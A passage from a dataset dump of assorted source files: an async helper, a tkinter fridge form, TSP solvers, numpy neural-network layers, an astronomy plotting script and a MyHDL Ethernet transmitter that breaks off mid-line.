\"\\n*** unable to open file ***\\n\" )\n in_file = None\n\n return in_file\n\n\nword_map = dict()\nin_file = open_file()\n\nif in_file != None:\n\n build_map( in_file, word_map )\n display_map( word_map )\n in_file.close()\n\n","sub_path":"Labs/lab09a.py","file_name":"lab09a.py","file_ext":"py","file_size_in_byte":1637,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"25139206","text":"# Copyright 2018 Canonical Ltd.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY 
KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n# __NOTE__\n#\n# Whenever this file is changed, make sure to update the copy of it in\n# ``zaza-openstack-tests``.\n#\n# The ``zaza`` and ``zaza-openstack-tests`` projects are related, and currently\n# the latter is installed as a package inside the former. As a consequence\n# ``zaza-openstack-tests`` needs to carry a copy of this file\n# (``zaza/__init__.py``) as this file will be overwritten by the copy in\n# ``zaza-openstack-tests`` on install.\n#\n# We of course want a better solution to this, but in the interest of time\n# this note is left here until we get around to fixing it properly.\n#\n# __NOTE__\n\n\"\"\"Functions to support converting async function to a sync equivalent.\"\"\"\nimport asyncio\nimport logging\nfrom pkgutil import extend_path\nfrom sys import version_info\n\n\n__path__ = extend_path(__path__, __name__)\n\n\ndef run(*steps):\n \"\"\"Run the given steps in an asyncio loop.\n\n If the tasks spawns other future (tasks) then these are also cleaned up\n after each step is performed.\n\n :returns: The result of the last asyncio.Task\n :rtype: Any\n \"\"\"\n if not steps:\n return\n try:\n loop = asyncio.get_running_loop()\n except RuntimeError:\n loop = asyncio.new_event_loop()\n except AttributeError:\n # Remove once support for Python 3.6 is dropped\n loop = asyncio.get_event_loop()\n\n for step in steps:\n task = loop.create_task(step)\n loop.run_until_complete(asyncio.wait([task]))\n\n # Let's also cancel any remaining tasks:\n while True:\n # issue #445 - asyncio.Task.all_tasks() deprecated in 3.7\n if version_info.major == 3 and version_info.minor >= 7:\n try:\n tasklist = asyncio.all_tasks()\n except RuntimeError:\n # no running event loop\n break\n else:\n tasklist = asyncio.Task.all_tasks()\n pending_tasks = [p for p in tasklist if not p.done()]\n if pending_tasks:\n logging.info(\n \"async -> sync. 
cleaning up pending tasks: len: {}\"\n .format(len(pending_tasks)))\n for pending_task in pending_tasks:\n pending_task.cancel()\n try:\n loop.run_until_complete(pending_task)\n except asyncio.CancelledError:\n pass\n except Exception as e:\n logging.error(\n \"A pending task caused an exception: {}\"\n .format(str(e)))\n else:\n break\n\n return task.result()\n\n\ndef sync_wrapper(f):\n \"\"\"Convert the given async function into a sync function.\n\n This is only to be called from sync code and it runs all tasks (and cancels\n all tasks at the end of each run) for the code that is being given.\n\n :returns: The de-async'd function\n :rtype: function\n \"\"\"\n def _wrapper(*args, **kwargs):\n async def _run_it():\n return await f(*args, **kwargs)\n return run(_run_it())\n return _wrapper\n","sub_path":"zaza/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"488213306","text":"import SetupAPI\nimport sqlite3\nimport tkinter as tk\nimport DataAPI\n\n\n\ndef CreateFridge():\n try:\n _fridgeID = fridgeID.get()\n _temperature = int(temp.get())\n _numShelves = int(numShelves.get())\n _widthShelves = int(widthShelves.get())\n print(DataAPI.AddFridge(conn, _fridgeID, _temperature, _numShelves, _widthShelves))\n except:\n print(\"ERROR: Invalid data entered\")\n \n \n\ndef console_PrintFridge():\n print(\"Fridge ID: %s\\nTemperature: %s\\nNumShelves: %s\\nNumBoxes: %s\" % (fridgeID.get(), temp.get(), numShelves.get(), widthShelves.get()))\n \n\nconn = sqlite3.connect('Test.db')\nconn.execute(\"PRAGMA foreign_keys = ON\")\nSetupAPI.CreateFridgeTable(conn) \n\nwindow_AddFridge = tk.Tk()\nwindow_AddFridge.geometry(\"300x300\")\nwindow_AddFridge.title(\"ADD FRIDGE\")\n\n#SETTING UP NEW FRIDGE FORM----------------------------------------------------------------\ntk.Label(window_AddFridge, text = \"Fridge ID\").grid(row = 0)\nfridgeID = tk.Entry(window_AddFridge)\nfridgeID.grid(row = 0, column = 1)\n\ntk.Label(window_AddFridge, text = \"Temperature\").grid(row = 1)\ntemp = tk.Entry(window_AddFridge)\ntemp.grid(row = 1, column = 1)\n\ntk.Label(window_AddFridge, text = \"Number of Shelves\").grid(row = 2)\nnumShelves = tk.Entry(window_AddFridge)\nnumShelves.grid(row = 2, column = 1)\n\ntk.Label(window_AddFridge, text = \"Number of Boxes\").grid(row = 3)\nwidthShelves = tk.Entry(window_AddFridge)\nwidthShelves.grid(row = 3, column = 1)\n\ntk.Button(window_AddFridge, text = 'Console Print', command = console_PrintFridge).grid(row = 7, column=1)\ntk.Button(window_AddFridge, text = 'Populate', command = CreateFridge).grid(row = 8, column=1)\n\nwindow_AddFridge.mainloop()\n\n\n\n \n\n\n\n\n\n","sub_path":"TestUI_Fridges.py","file_name":"TestUI_Fridges.py","file_ext":"py","file_size_in_byte":1705,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"360831561","text":"from typing import List, Dict\nfrom math import inf\n\n\nclass TspSolver:\n def __init__(self, adjacency_matrix: List[List[float]], start: int = 0) -> None:\n if len(adjacency_matrix) <= 2:\n raise Exception('TSP on 0, 1, or 2 nodes does not make any sense!')\n if len(adjacency_matrix) != len(adjacency_matrix[0]):\n raise Exception('Square matrix required for adjacency matrix!')\n if not 0 <= start < len(adjacency_matrix):\n raise IndexError('Starting node must be 0 <= s < N!')\n\n self._matrix = adjacency_matrix\n self._start = start # starting node\n self._solved 
= False\n        self._N = len(self._matrix)\n\n    @property\n    def start(self) -> int:\n        return self._start\n\n    @start.setter\n    def start(self, start: int) -> None:\n        if self._start != start:\n            if not 0 <= start < self._N:\n                raise IndexError('Starting node must be 0 <= s < N!')\n\n            self._start = start\n            self._solved = False  # flag to false so that the algorithm can be executed again\n\n    def min_cost(self) -> float:\n        raise NotImplementedError('Min cost method not implemented!')\n\n    def best_route(self) -> List[int]:\n        raise NotImplementedError('Best route method not implemented!')\n\n\n\nclass NaiveTspSolver(TspSolver):\n\n    def __init__(self, adjacency_matrix: List[List[float]], start: int = 0) -> None:\n        super().__init__(adjacency_matrix, start)\n        # caching all routes to prevent expensive execution\n        # key: cost, value: [[nodes of a route]]\n        self._routes = {}\n\n    def min_cost(self) -> float:\n        self._solve()\n        return min(self._routes)\n\n    def best_route(self) -> List[int]:\n        self._solve()\n        return self._routes[self.min_cost()][0]\n\n    def _solve(self) -> None:\n        if self._solved:\n            return\n\n        # starting point might have changed, so clear it first\n        self._routes.clear()\n\n        route = [self._start]\n        nodes = [x for x in range(self._N) if x != self._start]\n        self._tsp(route, nodes, 0)\n\n        # prevent re-execute\n        self._solved = True\n\n    # route param requires a list with starting node in it, else it will give key error\n    def _tsp(self, route: List[int], nodes: List[int], cost: float) -> None:\n        if len(nodes) == 0:\n            cost = round(cost, 4)\n            if cost in self._routes:\n                self._routes[cost].append(route)\n            else:\n                self._routes[cost] = [route]\n            return\n\n        for n in range(len(nodes)):\n            self._tsp(route=route + [nodes[n]], nodes=nodes[:n] + nodes[n + 1:],\n                      cost=cost + self._matrix[route[-1]][nodes[n]])\n\n\nclass DpTspSolver(TspSolver):\n\n    def __init__(self, adjacency_matrix: List[List[float]], start: int = 0) -> None:\n        super().__init__(adjacency_matrix, start)\n        self._min_cost = 0\n        self._best_route = []\n        self._END_STATE = (1 << self._N) - 1  # all bits are set to 1 (meaning all the nodes have been visited)\n\n    def min_cost(self) -> float:\n        self._solve()\n        return self._min_cost\n\n    def best_route(self) -> List[int]:\n        self._solve()\n        return self._best_route\n\n    def _solve(self) -> None:\n        if self._solved:\n            return\n\n        cost_memo = {}\n        node_memo = {}\n        state = 1 << self._start\n        self._min_cost = self._tsp(self._start, state, cost_memo, node_memo)\n        self._best_route = self._build_route(self._start, state, node_memo)\n\n        # prevent re-execute\n        self._solved = True\n\n    def _tsp(self, curr: int, state: int, cost_memo: Dict, node_memo: Dict) -> float:\n        if state == self._END_STATE:\n            return 0  # because we are not going back to starting\n\n        if (curr, state) in cost_memo:\n            return cost_memo[(curr, state)]\n\n        min_cost = inf\n        next_node = -1\n        for _next in range(self._N):\n            # skip if _next has been visited\n            if state & (1 << _next) != 0:\n                continue\n\n            next_state = state | (1 << _next)\n            cost = round(self._matrix[curr][_next] + self._tsp(_next, next_state, cost_memo, node_memo), 4)\n            if cost < min_cost:\n                min_cost = cost\n                next_node = _next\n\n        node_memo[(curr, state)] = next_node\n        cost_memo[(curr, state)] = min_cost\n        return min_cost\n\n    def _build_route(self, curr: int, state: int, node_memo: Dict) -> List[int]:\n        route = [curr]\n\n        while True:\n            if (curr, state) not in node_memo:\n                break\n            next_node = node_memo[(curr, state)]\n            route.append(next_node)\n            curr = next_node\n            state = state | (1 << next_node)\n\n        return route\r\n\r\n# def permute(a: List, b: List) -> Iterator:\r\n#     if len(b) == 0:\r\n#         yield a\r\n#\r\n#     for n in range(len(b)):\r\n#         yield from permute(a + [b[n]], b[:n] + b[n + 1:])\r\n
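\n# Small usage sketch (illustrative addition, not part of the original module):\n# on this 4-node instance both solvers should find cost 6 via route [0, 1, 2, 3].\nif __name__ == '__main__':\n    m = [[0, 1, 9, 4],\n         [1, 0, 2, 8],\n         [9, 2, 0, 3],\n         [4, 8, 3, 0]]\n    print(NaiveTspSolver(m).min_cost(), NaiveTspSolver(m).best_route())\n    print(DpTspSolver(m).min_cost(), DpTspSolver(m).best_route())\n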
","sub_path":"tripy/algorithms/tsp.py","file_name":"tsp.py","file_ext":"py","file_size_in_byte":5015,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
{"seq_id":"306404917","text":"import numpy as np\n\n\n\ndef softmax(predictions: np.ndarray):\n    '''\n    Computes probabilities from scores\n\n    Arguments:\n    predictions, np array, shape is either (N) or (batch_size, N) -\n        classifier output\n\n    Returns:\n    probs, np array of the same shape as predictions -\n        probability for every class, 0..1\n    '''\n    if len(predictions.shape) == 1:\n        probs = predictions.copy() - np.max(predictions)\n        result = np.exp(probs) / np.sum(np.exp(probs))\n    else:\n        max_array = np.repeat(np.max(predictions, axis=1), predictions.shape[1]).reshape(predictions.shape)\n        probs = predictions.copy() - max_array\n        result = np.exp(probs) / np.repeat(np.sum(np.exp(probs), axis=1), predictions.shape[1]).reshape(predictions.shape)\n\n    return result\n\n\ndef cross_entropy_loss(probs, target_index):\n    '''\n    Computes cross-entropy loss\n\n    Arguments:\n    probs, np array, shape is either (N) or (batch_size, N) -\n        probabilities for every class\n    target_index: np array of int, shape is (1) or (batch_size) -\n        index of the true class for given sample(s)\n\n    Returns:\n    loss: single value\n    '''\n    probs_copy = probs.copy()\n    if type(target_index) == int and len(probs.shape) == 1:\n        return -np.log(probs_copy[target_index])\n    else:\n        length = target_index.shape[0]\n        log_likelihood = -np.log(\n            probs[range(length), target_index.reshape(1, -1)])\n\n        return np.sum(log_likelihood) / length\n\n\ndef l2_regularization(W, reg_strength):\n    \"\"\"\n    Computes L2 regularization loss on weights and its gradient\n\n    Arguments:\n    W, np array - weights\n    reg_strength - float value\n\n    Returns:\n    loss, single value - l2 regularization loss\n    gradient, np.array same shape as W - gradient of weight by l2 loss\n    \"\"\"\n    loss = reg_strength * np.sum(W * W)\n\n    grad = reg_strength * 2 * W\n\n    return loss, grad\n\n\ndef softmax_with_cross_entropy(preds, target_index):\n    \"\"\"\n    Computes softmax and cross-entropy loss for model predictions,\n    including the gradient\n\n    Arguments:\n    predictions, np array, shape is either (N) or (batch_size, N) -\n        classifier output\n    target_index: np array of int, shape is (1) or (batch_size) -\n        index of the true class for given sample(s)\n\n    Returns:\n    loss, single value - cross-entropy loss\n    dprediction, np array same shape as predictions - gradient of predictions by loss value\n    \"\"\"\n    p = preds.copy()\n    target = target_index\n    if len(preds.shape) == 1:\n        p = p.reshape(1, -1)\n    if type(target_index) == int:\n        target = np.array([target_index])\n\n    probs = softmax(p)\n    loss = cross_entropy_loss(probs, target)\n\n    y = np.eye(p.shape[1])[target]\n    y = y.reshape(p.shape[0], -1)\n    dprediction = probs - y\n\n    if len(preds.shape) == 1:\n        dprediction = dprediction.reshape(-1)\n    else:\n        dprediction /= p.shape[0]\n\n    return loss, dprediction\n
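\n# Worked example (added note): for preds = np.array([1., 2., 3.]) and\n# target_index = 2, softmax gives roughly [0.090, 0.245, 0.665], so the loss\n# is -log(0.665) ~= 0.408 and dprediction equals probs - one_hot(target).\n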
\nclass Param:\n    \"\"\"\n    Trainable parameter of the model\n    Captures both parameter value and the gradient\n    \"\"\"\n\n    def __init__(self, value):\n        self.value = value\n        self.grad = np.zeros_like(value)\n\n\nclass ReLULayer:\n    def __init__(self):\n        pass\n\n    def forward(self, X):\n        # Save the positive-input mask so the backward pass can route\n        # gradients only through the units that were active\n        self.index = X > 0\n        return X * self.index\n\n    def backward(self, d_out):\n        \"\"\"\n        Backward pass\n\n        Arguments:\n        d_out, np array (batch_size, num_features) - gradient\n           of loss function with respect to output\n\n        Returns:\n        d_result: np array (batch_size, num_features) - gradient\n          with respect to input\n        \"\"\"\n        return self.index.astype(float) * d_out\n\n    def params(self):\n        # ReLU doesn't have any parameters\n        return {}\n\n\nclass FullyConnectedLayer:\n    def __init__(self, n_input, n_output):\n        self.W = Param(0.001 * np.random.randn(n_input, n_output))\n        self.B = Param(0.001 * np.random.randn(1, n_output))\n        self.X = None\n\n    def forward(self, X):\n        self.X = X\n        return X.dot(self.W.value) + self.B.value\n\n    def backward(self, d_out):\n        \"\"\"\n        Backward pass\n        Computes gradient with respect to input and\n        accumulates gradients within self.W and self.B\n\n        Arguments:\n        d_out, np array (batch_size, n_output) - gradient\n           of loss function with respect to output\n\n        Returns:\n        d_result: np array (batch_size, n_input) - gradient\n          with respect to input\n        \"\"\"\n        self.W.grad = self.X.T.dot(d_out)\n        self.B.grad = np.sum(d_out, axis=0, keepdims=True)\n\n        return d_out.dot(self.W.value.T)\n\n    def params(self):\n        return {'W': self.W, 'B': self.B}\n","sub_path":"assignments/assignment2/layers.py","file_name":"layers.py","file_ext":"py","file_size_in_byte":4895,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
{"seq_id":"522825234","text":"try : \n    a = 3\n    if a < 4 :\n\n        # throws ZeroDivisionError for a = 3 \n        b = a/(a-3)\n\n    # throws NameError if a >= 4\n    print (\"Value of b = \", b)\n\n# note that parentheses are necessary here for multiple exceptions\nexcept(ZeroDivisionError, NameError):\n    print (\"\\nError Occurred and Handled\")\n","sub_path":"advance1/exception_handling/except1.py","file_name":"except1.py","file_ext":"py","file_size_in_byte":318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
{"seq_id":"62120443","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Mar 21 11:42:35 2019\n\n@author: ppxee\n\"\"\"\n\n### Import required libraries ###\nimport matplotlib.pyplot as plt #for plotting\nfrom astropy.io import fits #for handling fits\nfrom astropy.table import Table #for handling tables\nimport numpy as np #for handling arrays\n#import math\n#from astropy.stats import median_absolute_deviation\nimport vari_funcs #my module to help run code neatly\nplt.close('all')\nplt.style.use('default')\n\n### Get fits files ###\n#xdata = fits.open('variable_tables/no06_variables_chi30_nospectra_xray.fits')[1].data\n#tbdata = fits.open('variable_tables/no06_variables_chi30_nospectra.fits')[1].data\n#xdata = fits.open('variable_tables/no06_variables_chi30_noUDSz_xray.fits')[1].data\n#tbdata = fits.open('variable_tables/no06_variables_chi30_noUDSz.fits')[1].data\nchandata = fits.open('variable_tables/no06_variables_chi30_chandata_DR11data_restframe.fits')[1].data\nxmmdata = fits.open('variable_tables/no06_variables_chi30_xmmdata_DR11data_restframe.fits')[1].data\ntbdata = fits.open('variable_tables/no06_variables_chi30_DR11data_restframe.fits')[1].data\n\n### Remove edges ###\ntbdata = vari_funcs.remove_edges(tbdata)\n#xdata = vari_funcs.remove_edges(xdata)\n\nchandata = vari_funcs.remove_edges(chandata)\nxmmdata = vari_funcs.remove_edges(xmmdata)\n\nnontb = tbdata[~tbdata['X-ray']]\n#xtb = tbdata[tbdata['X-ray']]\n\n### Apply a magnitude cut ###\nhightbdata = 
tbdata[tbdata['iMAG_20']<24]\nhighnontb = nontb[nontb['iMAG_20']<24]\n#xdata = xdata[xdata['iMAG_20']<24]\n#\nhighchandata = chandata[chandata['iMAG_20']<24]\nhighxmmdata = xmmdata[xmmdata['iMAG_20']<24]\n\n#tbdata = tbdata[tbdata['RMAG_20']<24.5]\n#nontb = nontb[nontb['RMAG_20']<24.5]\n#xdata = xdata[xdata['RMAG_20']<24.5]\n\n\n\n### Get positions ###\nnonRA = nontb['ALPHA_J2000']\nnonDec = nontb['DELTA_J2000']\n#xRA = xdata['ALPHA_J2000']\n#xDec = xdata['DELTA_J2000']\n\nchanRA = chandata['ALPHA_J2000']\nchanDec = chandata['DELTA_J2000']\nxmmRA = xmmdata['ALPHA_J2000']\nxmmDec = xmmdata['DELTA_J2000']\nxRA = np.append(chanRA, xmmRA)\nxDec = np.append(chanDec, xmmDec)\n\nhighnonRA = highnontb['ALPHA_J2000']\nhighnonDec = highnontb['DELTA_J2000']\n#xRA = xdata['ALPHA_J2000']\n#xDec = xdata['DELTA_J2000']\n\nhighchanRA = highchandata['ALPHA_J2000']\nhighchanDec = highchandata['DELTA_J2000']\nhighxmmRA = highxmmdata['ALPHA_J2000']\nhighxmmDec = highxmmdata['DELTA_J2000']\nhighxRA = np.append(highchanRA, highxmmRA)\nhighxDec = np.append(highchanDec, highxmmDec)\n\n### Plot positions ###\nplt.figure(figsize=[8,8])\nplt.plot(highnonRA, highnonDec, 'bo',markersize=10)\nplt.plot(highxRA, highxDec, 'ro',markersize=10)\nplt.plot(nonRA, nonDec, 'b+',alpha=0.5,zorder=0)\nplt.plot(xRA, xDec, 'r+',alpha=0.5,zorder=0)\nplt.xlim(xmin=34, xmax=34.9)\nplt.ylim(ymin=-5.6, ymax=-4.65)\n#plt.xlim(xmin=34.06, xmax=34.87)\n#plt.ylim(ymin=-5.54, ymax=-4.7)\nplt.gca().invert_xaxis()\nplt.xlabel('RA')\nplt.ylabel('Dec')\n\n### Plot on the IMACS FoV ###\ndiam = 27.4/60 # 27.4 arcmin\ncircle1= plt.Circle((34.645,-4.88), radius=diam/2, fill=False, color='k')\nplt.gca().add_artist(circle1)\ncircle2= plt.Circle((34.23,-4.98), radius=diam/2, fill=False, color='k')\nplt.gca().add_artist(circle2)\ncircle3= plt.Circle((34.65,-5.25), radius=diam/2, fill=False, color='k')\nplt.gca().add_artist(circle3)\ncircle4= plt.Circle((34.34,-5.33), radius=diam/2, fill=False, color='k')\nplt.gca().add_artist(circle4)\nplt.tight_layout()\n\nprint('Full sample')\nprint('Total = '+str(len(tbdata)))\nprint('X-ray = '+str(len(xRA)))\n\n### plot r band hist of sample ###\n#mask1 = tbdata['RMAG_20']!=99\n#rmag = tbdata['RMAG_20']#[mask1]\n#mask1 = xdata['RMAG_20']!=99\n#xrmag = xdata['RMAG_20'][mask1]\n\n#xrayrmag = np.append(chanrmag,xmmrmag)\n#med = np.median(nonrmag)\n#plt.figure()\n#plt.hist(nonrmag, color='b', label = 'Non X-ray',histtype='step')\n#plt.hist(xrayrmag, color='r', label='X-ray',histtype='step')\n#plt.xlabel('R Band Magnitude')\n#plt.ylabel('Counts')\n#plt.legend()\n#plt.tight_layout()\n###%% Restrict to >1e4 Average Flux ###\n##\n#### Create arrays of flux values ###\n##allflux = vari_funcs.flux5_stacks(tbdata)\n##flux = vari_funcs.flux5_stacks(nontb)\n##chanflux = vari_funcs.flux5_stacks(chandata) \n##xmmflux = vari_funcs.flux5_stacks(xmmdata)\n##\n##### Get average flux ###\n##avgallflux = np.nanmean(allflux, axis=1)\n##avgflux = np.nanmean(flux, axis=1)\n##avgchanflux = np.nanmean(chanflux, axis=1)\n##avgxmmflux = np.nanmean(xmmflux, axis=1)\n##\n##hightbdata = tbdata[avgallflux > 1e4]\n##highnontb = nontb[avgflux > 1e4]\n##highchandata = chandata[avgchanflux > 1e4]\n##highxmmdata = xmmdata[avgxmmflux > 1e4]\n##\n##### Get positions ###\n##nonRA = highnontb['ALPHA_J2000']\n##nonDec = highnontb['DELTA_J2000']\n##chanRA = highchandata['ALPHA_J2000']\n##chanDec = highchandata['DELTA_J2000']\n##xmmRA = highxmmdata['ALPHA_J2000']\n##xmmDec = highxmmdata['DELTA_J2000']\n#\n#### Plot positions 
###\n#plt.figure(figsize=[8,8])\n#plt.plot(nonRA, nonDec, 'bo')\n#plt.plot(chanRA, chanDec, 'ro')\n#plt.plot(xmmRA, xmmDec, 'ro')\n#plt.xlim(xmin=34, xmax=34.9)\n#plt.ylim(ymin=-5.6, ymax=-4.65)\n#plt.gca().invert_xaxis()\n#plt.xlabel('RA')\n##plt.savefig('plots/Chi_variables/no06_extra_clean/positions_highflux.pdf')\n#\n#### Plot on the IMACS FoV ###\n#diam = 27.4/60 # 27.4 arcmin\n#circle1= plt.Circle((34.64,-4.93), radius=diam/2, fill=False, color='k')\n#plt.gca().add_artist(circle1)\n#circle2= plt.Circle((34.23,-4.93), radius=diam/2, fill=False, color='k')\n#plt.gca().add_artist(circle2)\n#circle3= plt.Circle((34.64,-5.32), radius=diam/2, fill=False, color='k')\n#plt.gca().add_artist(circle3)\n#circle4= plt.Circle((34.23,-5.32), radius=diam/2, fill=False, color='k')\n#plt.gca().add_artist(circle4)\n##print('High Flux')\n#print('Total = '+str(len(hightbdata)))\n#print('X-ray = '+str(len(chanRA)+len(xmmRA)))\n\n#### plot r band hist of high flux sample ###\n#mask1 = hightbdata['RMAG_20']!=99\n#rmag = hightbdata['RMAG_20'][mask1]\n#mask1 = highnontb['RMAG_20']!=99\n#nonrmag = highnontb['RMAG_20'][mask1]\n#mask1 = highchandata['RMAG_20']!=99\n#chanrmag = highchandata['RMAG_20'][mask1]\n#mask1 = highxmmdata['RMAG_20']!=99\n#xmmrmag = highxmmdata['RMAG_20'][mask1]\n#\n#xrayrmag = np.append(chanrmag,xmmrmag)\n#plt.figure()\n#plt.hist(nonrmag, color='b', label = 'Non X-ray',histtype='step')\n#plt.hist(xrayrmag, color='r', label='X-ray',histtype='step')\n#plt.xlabel('R Band Magnitude')\n#plt.ylabel('Counts')\n#plt.legend()\n#plt.tight_layout()","sub_path":"positions_imacs.py","file_name":"positions_imacs.py","file_ext":"py","file_size_in_byte":6380,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"411254442","text":"from Globals import *\r\nfrom CRC32 import CRC32\r\nTxS = enum('IDLE', 'ETH', 'ARP', 'IP', 'UDP', 'DATA', 'CRC','GAP', encoding=\"one_hot\")\r\n\r\ndef ToChar(a):\r\n #b = Signal(modbv(0)[4:])\r\n b = 0\r\n if a <= 9:\r\n b = a + 17\r\n else:\r\n b = a + 24\r\n return b\r\n\r\n@block\r\ndef Mac_Tx(clk,TxEn, TxErr, TxData, TxEnd, SendEn, SendData, SendDataEn, srcMac, desMac, EtherType, IP_Total_Length, IP_Protocal,\r\n srcIP, desIP, srcPort, desPort, UDP_Length, Data_Length, GapLength,TxCNT, Ram, IDLE):\r\n State, StateReg = (Signal(TxS.IDLE) for i in range(2))\r\n CNT = Signal(modbv(0)[12:0])\r\n EthHeader, IPHeader, UDPHeader,ARP_Data, PktData, TxDataReg = (Signal(modbv(0)[8:]) for frog in range(6))\r\n TxEnReg,TxEnReg1 = (Signal(bool(0)) for frog in range(2))\r\n CrcReset, CrcEnable = (Signal(bool(0)) for i in range(2))\r\n Crc, CrcNext = (Signal(modbv(0xffffffff)[32:]) for i in range(2))\r\n IPHeader_CheckSum = Signal(modbv(0)[32:])\r\n\r\n\r\n iCRC32 = CRC32(clk, CrcReset, TxDataReg, CrcEnable, Crc, CrcNext)\r\n\r\n @always_seq(clk.posedge, reset=None)\r\n def Seq():\r\n if State == TxS.IDLE:\r\n IDLE.next = 1\r\n CNT.next = 0\r\n EthHeader.next = 0\r\n IPHeader.next = 0\r\n UDPHeader.next = 0\r\n TxEnReg.next = 0\r\n TxErr.next = 0\r\n Ram.we.next = 0\r\n Ram.addr.next = 0\r\n Ram.din.next = 0\r\n TxEnd.next = 0\r\n CrcReset.next = 0\r\n SendDataEn.next = 0\r\n IPHeader_CheckSum.next = 0\r\n if SendEn:\r\n State.next = TxS.ETH\r\n IDLE.next = 0\r\n\r\n if State == TxS.ETH:\r\n if CNT < Ether_Header_Len - 1:\r\n CNT.next = CNT + 1\r\n else:\r\n CNT.next = 0\r\n if EtherType == EtherType_IPv4:\r\n State.next = TxS.IP\r\n elif EtherType == EtherType_ARP:\r\n State.next = TxS.ARP\r\n else:\r\n TxErr.next = 1\r\n State.next = 
TxS.GAP\r\n\r\n if CNT == 0: TxEnReg.next = 1\r\n if CNT <= 6: EthHeader.next = 0x55\r\n if CNT == 7: EthHeader.next = 0xd5\r\n if CNT == 8: EthHeader.next = desMac[48:40]\r\n if CNT == 9: EthHeader.next = desMac[40:32]\r\n if CNT == 10: EthHeader.next = desMac[32:24]\r\n if CNT == 11: EthHeader.next = desMac[24:16]\r\n if CNT == 12: EthHeader.next = desMac[16:8]\r\n if CNT == 13: EthHeader.next = desMac[8:]\r\n if CNT == 14: EthHeader.next = srcMac[48:40]\r\n if CNT == 15: EthHeader.next = srcMac[40:32]\r\n if CNT == 16: EthHeader.next = srcMac[32:24]\r\n if CNT == 17: EthHeader.next = srcMac[24:16]\r\n if CNT == 18: EthHeader.next = srcMac[16:8]\r\n if CNT == 19: EthHeader.next = srcMac[8:]\r\n if CNT == 20: EthHeader.next = EtherType[16:8]\r\n if CNT == 21: EthHeader.next = EtherType[8:]\r\n\r\n if CNT == 1: Ram.din.next = 53 #T #For Gui\r\n if CNT == 2: Ram.din.next = 89 #x\r\n if CNT == 3: Ram.din.next = 27 #:\r\n if CNT >= 1 and CNT <= 3:\r\n Ram.we.next = 1\r\n if CNT > 1:\r\n Ram.addr.next = Ram.addr + 1\r\n else:\r\n Ram.we.next = 0\r\n if CNT == 9: CrcEnable.next = 1\r\n\r\n if State == TxS.ARP:\r\n if CNT < ARP_Len + 4 - 1:\r\n CNT.next = CNT + 1\r\n else:\r\n CNT.next = 0\r\n State.next = TxS.GAP\r\n\r\n ARP_Data.next = 0xab\r\n if CNT == 1: Ram.din.next = 34 #A #For Gui\r\n if CNT == 2: Ram.din.next = 51 #R\r\n if CNT == 3: Ram.din.next = 49 #P\r\n if CNT >= 1 and CNT <= 3:\r\n Ram.we.next = 1\r\n Ram.addr.next = Ram.addr + 1\r\n else:\r\n Ram.we.next = 0\r\n\r\n if State == TxS.IP:\r\n EthHeader.next = 0\r\n if CNT < IP_Header_Len - 1:\r\n CNT.next = CNT + 1\r\n else:\r\n CNT.next = 0\r\n State.next = TxS.UDP\r\n\r\n if CNT == 0: IPHeader.next = IP_Version_HeaderLen\r\n if CNT == 1: IPHeader.next = TypeofService\r\n if CNT == 2: IPHeader.next = IP_Total_Length[16:8]\r\n if CNT == 3: IPHeader.next = IP_Total_Length[8:]\r\n if CNT == 4: IPHeader.next = 0 #标识 Identification\r\n if CNT == 5: IPHeader.next = 0\r\n if CNT == 6: IPHeader.next = 0 #Flags, Fragment Offset\r\n if CNT == 7: IPHeader.next = 0\r\n if CNT == 8: IPHeader.next = 0x40 #Time to Live\r\n if CNT == 9: IPHeader.next = IP_Protocal #Protocol UDP,TCP\r\n if CNT == 10: IPHeader.next = IPHeader_CheckSum[16:8] #Header Checksum\r\n if CNT == 11: IPHeader.next = IPHeader_CheckSum[8:0]\r\n if CNT == 12: IPHeader.next = srcIP[32:24]\r\n if CNT == 13: IPHeader.next = srcIP[24:16]\r\n if CNT == 14: IPHeader.next = srcIP[16:8]\r\n if CNT == 15: IPHeader.next = srcIP[8:]\r\n if CNT == 16: IPHeader.next = desIP[32:24]\r\n if CNT == 17: IPHeader.next = desIP[24:16]\r\n if CNT == 18: IPHeader.next = desIP[16:8]\r\n if CNT == 19: IPHeader.next = desIP[8:]\r\n\r\n if CNT == 0: IPHeader_CheckSum.next = IPHeader_CheckSum + TypeofService + IP_Version_HeaderLen << 8\r\n if CNT == 1: IPHeader_CheckSum.next = IPHeader_CheckSum + IP_Total_Length\r\n if CNT == 2: IPHeader_CheckSum.next = IPHeader_CheckSum + IP_Protocal + 0x4000\r\n if CNT == 3: IPHeader_CheckSum.next = IPHeader_CheckSum + srcIP[32:16] + srcIP[16:]\r\n if CNT == 4: IPHeader_CheckSum.next = IPHeader_CheckSum + desIP[32:16] + desIP[16:]\r\n if CNT == 5:\r\n if IPHeader_CheckSum[32:16] == 0:\r\n IPHeader_CheckSum.next[16:] = ~IPHeader_CheckSum[16:]\r\n else:\r\n IPHeader_CheckSum.next[16:] = ~(IPHeader_CheckSum[16:] + IPHeader_CheckSum[32:16])\r\n\r\n\r\n if CNT == 10:\r\n if IP_Protocal == IP_Protocal_TCP: Ram.din.next = 53 #T\r\n elif IP_Protocal == IP_Protocal_UDP: Ram.din.next = 54 #U\r\n else: Ram.din.next = 57 #X\r\n if CNT == 11:\r\n if IP_Protocal == IP_Protocal_TCP: 
